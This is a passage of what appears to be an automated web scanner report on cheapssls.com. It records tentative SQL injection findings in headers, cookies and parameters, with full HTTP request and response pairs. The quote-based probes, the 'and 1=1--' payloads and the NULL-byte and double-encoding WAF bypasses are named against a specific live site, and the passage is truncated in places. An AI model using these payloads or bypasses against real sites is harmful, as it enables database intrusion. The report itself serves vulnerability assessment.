ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:54:18 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:54:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:54:17 GMT
Content-Length: 1048

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': { '5b91fafac406f3f976c0427201da50c5': {
...[SNIP]...

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

1.7. http://www.cheapssls.com/index.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:05 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=ncc9kj9io45uoj9fi65bo55df5; expires=Sat, 17-Sep-2011 21:55:05 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:04 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

1.8. http://www.cheapssls.com/index.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Content-Length: 791
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btitle%5D=QuickSSL+Premium+Certificates+from+Geotrust+as+low+as+%2496.50%2Fyear.+Cheapssls.com+-+Same
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:50:24 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=av3i5cjq840r8oducgipgvfit5; expires=Sat, 17-Sep-2011 21:50:24 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:50:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:50:24 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Content-Length: 791
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.1.10.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl-premium.html&ve%5Btitle%5D=QuickSSL+Premium+Certificates+from+Geotrust+as+low+as+%2496.50%2Fyear.+Cheapssls.com+-+Same
...[SNIP]...

Response 2

1.9. http://www.cheapssls.com/index.php [__utmb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424'; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:38 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=pkocsogmbaf1vi4iaajpdf4716; expires=Sat, 17-Sep-2011 21:49:38 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:49:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:38 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424''; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

1.10. http://www.cheapssls.com/index.php [stat_uniq_code cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The stat_uniq_code cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the stat_uniq_code cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the stat_uniq_code cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386%2527; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:21 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=rbvfnqfkmjp3bd4bj763nicgg1; expires=Sat, 17-Sep-2011 21:49:21 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386%2527; expires=Sun, 02-Sep-2012 21:49:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:21 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386%2527%2527; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

1.11. https://www.cheapssls.com/index.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 22:10:56 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=7uv22qlq49s55pskbvdl5fqoi1; expires=Sat, 17-Sep-2011 22:10:56 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386%27+and+1%3D1--+; expires=Sun, 02-Sep-2012 22:10:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 22:10:56 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response 2

1.12. https://www.cheapssls.com/index.php [sgTrackerUserId cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.cheapssls.com
Path:	/index.php

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows%2527%2527&ve%5Bclient_language%5D=en-US&ve%5Breferrer%5D=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ve%5Bscreen_x%5D=1920&ve%5Bscreen_y%5D=1200&ve%5Bcolor%5D=16&ve%5Btime_begin%
...[SNIP]...

Response 2

1.17. https://www.cheapssls.com/index.php [ve%5Burl%5D parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The ve%5Burl%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ve%5Burl%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 486
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.20.9.1315085555105; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart%00'&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowser_version%5D=13.0.782.218&ve%5Bbrowser%5D=Chrome&ve%5Bos%5D=Windows&ve%5Bclient_la
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:49:20 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=5kmg5l9v8a0jd8f6a9e6qhrhf2; expires=Sat, 17-Sep-2011 21:49:20 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=51f1b%250d%250af904b85b4d7; expires=Sun, 02-Sep-2012 21:49:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:49:20 GMT
